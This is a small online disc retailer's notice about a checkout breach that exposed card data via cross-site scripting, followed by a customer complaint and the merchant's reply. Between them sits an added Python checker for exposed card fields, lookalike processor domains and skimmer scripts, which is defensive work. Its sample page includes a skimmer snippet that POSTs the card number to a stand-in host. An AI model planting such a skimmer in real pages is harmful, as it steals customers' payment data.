Website Security Compromise – Site Now Secure
Post updated September 26th
It has come to our attention that InfiniteDiscs.com was likely hacked sometime in August, and that some customer credit card information entered in our direct credit card checkout was intercepted and shared with a third party.
Our monthly Trustwave PCI security scan notified us on September 10th that our site needed a security patch due to a “Microsoft Internet Information Services (IIS) Cross-Site Scripting Vulnerability.”
At the time we received the notification of this vulnerability, we did not see any evidence that any customer card information had been compromised. However, it was brought to our attention today that several customers have found fraudulent charges on their accounts over the past few days. We suspect that customers who placed orders in August and the beginning of September could have had their cards compromised. If you placed an order during this time period, please check your credit card statements to make sure that you were not a victim of any fraudulent charges.
Website Is Now Secure
This security patch was installed on Tuesday, September 19th, and the vulnerability has been resolved. Our Trustwave scan now shows that our site passes its PCI compliance scan.
In addition, to ensure that everything is clean and no customer information is at risk, we also had our web hosting company scan our server for malicious files. That scan found no signs of malicious scripts.
Card Info Now Entered at Authorize.net
Since the breach, we have also changed our checkout process so that card information is never again entered on our domain, to eliminate the risk of a future cross-site scripting hack. All credit card information is now entered directly on our payment processors' domains, Authorize.net or PayPal.com. Infinite Discs does not, and never has, collected or stored any customer credit card information. You can be confident that your credit card purchases through InfiniteDiscs.com will be secure.
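The point of the change above is that card data typed into a page on the merchant's own origin can be read by any script running on that origin, including one injected through a cross-site scripting flaw, no matter which host the form eventually posts to. The following checker, an added example that is not code from Infinite Discs, Trustwave or Authorize.net, flags card-entry inputs on a merchant page, verifies that the hand-off form goes to an allow-listed processor host rather than a lookalike, and flags inline scripts that touch card fields while contacting some other host (the shape of an injected skimmer). The hostnames, paths and sample markup are constructed for the example.

```python
"""
Checkout-page checker (added example; hostnames and markup are hypothetical).

Checks run over constructed sample pages embedded below:
  1. Any <input> for card data on the merchant's page is a finding: every
     script executing on that origin, including one injected via XSS, can read
     what the customer types there, regardless of the form's action.
  2. A form that hands the customer off to another host must go to an
     allow-listed processor host (lookalike domains are a classic trick).
  3. Inline scripts that reference card fields must not contact any host
     other than the merchant or an allow-listed processor.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names / autocomplete tokens that indicate card data entry.
CARD_FIELD = re.compile(r"card|ccnum|cc[-_]?number|\bpan\b|cvv|cvc|expir", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def on_host(host, allowed):
    """True if host equals an allowed host or is a subdomain of one."""
    return any(host == a or host.endswith("." + a) for a in allowed)


class CheckoutParser(HTMLParser):
    """Collects forms (action + card-like inputs) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts = [], []
        self._form, self._script = None, None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            name = a.get("name") or a.get("id") or ""
            auto = a.get("autocomplete") or ""
            if CARD_FIELD.search(name) or auto.startswith("cc-"):
                self._form["fields"].append(name)
        elif tag == "script" and "src" not in a:
            self._script = []  # start capturing an inline script body

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script" and self._script is not None:
            self.scripts.append("".join(self._script))
            self._script = None

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)


def check_checkout_page(html, merchant_host, processor_hosts):
    """Return a list of finding strings; an empty list means the page passes."""
    p = CheckoutParser()
    p.feed(html)
    findings = []
    for f in p.forms:
        host = urlparse(f["action"]).netloc.lower() or merchant_host
        if f["fields"]:
            # Flagged even if the action is the processor: the data is typed here.
            findings.append(f"card fields {f['fields']} are entered on "
                            f"{merchant_host}; any script on this origin can read them")
        elif host != merchant_host and not on_host(host, processor_hosts):
            findings.append(f"checkout hands off to {host}, not an allow-listed processor")
    for s in p.scripts:
        if not CARD_FIELD.search(s):
            continue
        for host in {h.lower() for h in URL_HOST.findall(s)}:
            if host != merchant_host and not on_host(host, processor_hosts):
                findings.append(f"inline script touches card fields and contacts {host}")
    return findings


MERCHANT = "www.infinitediscs.com"
PROCESSORS = {"authorize.net", "paypal.com"}

# Constructed sample: card fields on the merchant page plus a skimmer-shaped
# inline script that forwards the card number off-site as it is typed.
EXPOSED_PAGE = """
<form action="/checkout/submit" method="post">
  <input name="cardNumber" autocomplete="cc-number">
  <input name="cvv"> <input name="expiry">
</form>
<script>
document.querySelector('[name=cardNumber]').addEventListener('change', e =>
  fetch('https://cdn-stats.example.net/c', {method: 'POST', body: e.target.value}));
</script>
"""

# Constructed sample: only shipping data on the merchant page; the card step is
# a hand-off to a (hypothetical) hosted page on the processor's domain.
HOSTED_PAGE = """
<form action="/checkout/address" method="post">
  <input name="name"> <input name="address"> <input name="zip">
</form>
<form action="https://hosted.authorize.net/pay" method="post">
  <input type="hidden" name="order_id" value="1001">
  <input type="hidden" name="amount" value="42.00">
  <button>Pay with card</button>
</form>
"""

# Constructed sample: hand-off to a lookalike domain.
LOOKALIKE_PAGE = '<form action="https://authorize-net.example.com/pay"><button>Pay</button></form>'

if __name__ == "__main__":
    for label, page in [("exposed", EXPOSED_PAGE), ("hosted", HOSTED_PAGE),
                        ("lookalike", LOOKALIKE_PAGE)]:
        print(label, check_checkout_page(page, MERCHANT, PROCESSORS) or "ok")
```

Note the first check deliberately ignores where the form posts: a form that collects the card number on the merchant page and submits it straight to the processor still exposes that number to every script on the merchant origin. A hosted payment page, where the inputs are rendered on the processor's domain, is what removes that exposure; the merchant page then carries only the hand-off, which is what the allow-list check covers.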
I was a big fan of your website…till I had to cancel two debit cards and be refunded money by my bank because of fraud on my account. I now know that ordering discs from your website is the cause. I would like to still be able to order from Infinite Discs but just don’t think I can trust it again.
We have also hated the fact that somebody out there felt it necessary to do this to our customers and to our business. We have constantly changed our firewalls and used secure checkout, but in today’s world, this kind of hacking is breaking down some of the largest companies in the country (see Equifax, Target, etc.). As a result, we have taken all checkout payments completely off of our website. Customers have always had the option to check out through PayPal, using their security measures. Now when customers select to check out with credit cards (not using PayPal) they are taken to Authorize.net, which is another very large credit card processor. That is the best way we could handle the situation, putting credit card security into the hands of companies that are large, trusted, and more secure than our own small business website.
Just to be clear as well: Infinite Discs has NEVER stored credit card information. We never see it and never have. Any hack was of the card entry page when people were checking out, and that has been completely removed. So, from now on, we not only never see or handle the data, but it isn’t even entered on our website during the checkout process.
Thanks for your support and patience as we’ve worked out this big problem, and I’m glad that the bank took care of the fraudulent charge refunds.